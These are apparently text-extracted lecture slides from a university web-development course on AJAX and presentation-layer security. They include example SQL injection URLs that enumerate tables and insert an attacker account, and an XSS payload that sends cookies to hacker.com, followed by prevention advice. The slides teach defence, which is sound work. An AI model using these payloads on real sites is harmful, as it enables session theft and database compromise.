CSE 136 - Lecture 8

AJAX Presentation Layer Security Lab

AJAX - what & why?

Asynchronous Javascript and XML

Why? To avoid postback -

saves page re-loading time

Transfer smaller amount of data across network

Example: select year, make, model

Improve performance

AJAX - flow

Ajax - postback vs callback

Ajax - ASP.NET Ajax Architecture

basic functionality - stringmanipulation, components,networking, and webservices

provideobject-orientedtechniques withJavaScript code

Web Attack - Resource Enumeration

Common Files test.txt back.zip upload.zip passwords.txt users.txt checkout.aspx.bak checkout.asp.old

Common Directories /admin /reports /test /upload /temp /include /logs

Web Attack - Parameter manipulation

/student/details/1000 change to 1001? SQL Injection

query = "select product_name from product where product_id=" + PID

PID comes from web parameter: http://myweb.com/product.aspx?PID=1 http://myweb.com/product.aspx?PID=1;union

select name from sysobjects where xtype='U' Hackers add himself to the Users table

http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')

Web Attack – cross site scripting (XSS)

Once you comprise the database, insert javascript into the tables product.description

= ,'<script>document.location='http://hacker.com/collector.html? cookie='+document.cookie</script>

Hacker now knows your cookie when the content is rendered.

Danger of cross site scripting Contents of the current document cookie is sent off to

hacker.com Session IDs and authentication tokens are commonly stored

in cookies Javascript can log key strokes

Web Attack - Prevention

Remove all SQL Injection code HTML-Encode all data displayed to prevent XSS Treat any input as potential threat

user can enter javascript in textbox and textarea Use validation on the server (user could disable javascript error

checking on browser) Encrypt cookies

user_id="100" // No user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-

TVLLC-RWJOT-CTHAM-GJQHD" Upload Files:

Email attachment Business documents Servers should run Virus checker on all uploaded files

Web Attack and AJAX

The methods of a Web service are analogous to the form inputs of a Web application.

They are easy to find, easy to attack

WSDL is now open to public (example data often provided)

Web Attack - Traditional vs AJAX

Traditional:

These features arehidden from the User

AJAX & Web-services:

each feature is nowexposed to the public

Web Attack - white vs. black

Traditional Black Box:

filtered data at theweb server

(only last 4 digit ofcc number)Whitebox:

Unfiltered data fromBusiness/service Layer

(show entire cc number)Exposed BL domain model

Web Attack - Ajax security mistakes

Traditional:

Ajax service

Hacker bypass the admin file directly and go directly to AJAX files to access the info

Ajax serviceexposed toeveryone

Solution:Use cookie at the WEB web-service

Web Attack - Securing Ajax server

Install validation filter Use Regular

Expression to validate input strings

Use Regular Expression to remove "attack" characters: < & \ />, etc

Validate user thru cookies/sessions (WEB web-services)

Review question

Is ajax synchronous or asynchronous? Why used ajax? Is ajax architecture more secured or less? What is XSS? Difference between white box and black box?

Your assignment

Complete your MVC project with test cases

Project due next Thursday

Lab

Due: Grade your middle tier and test cases

References

.NET : Architecting Applications for the Enterprise

Ajax Security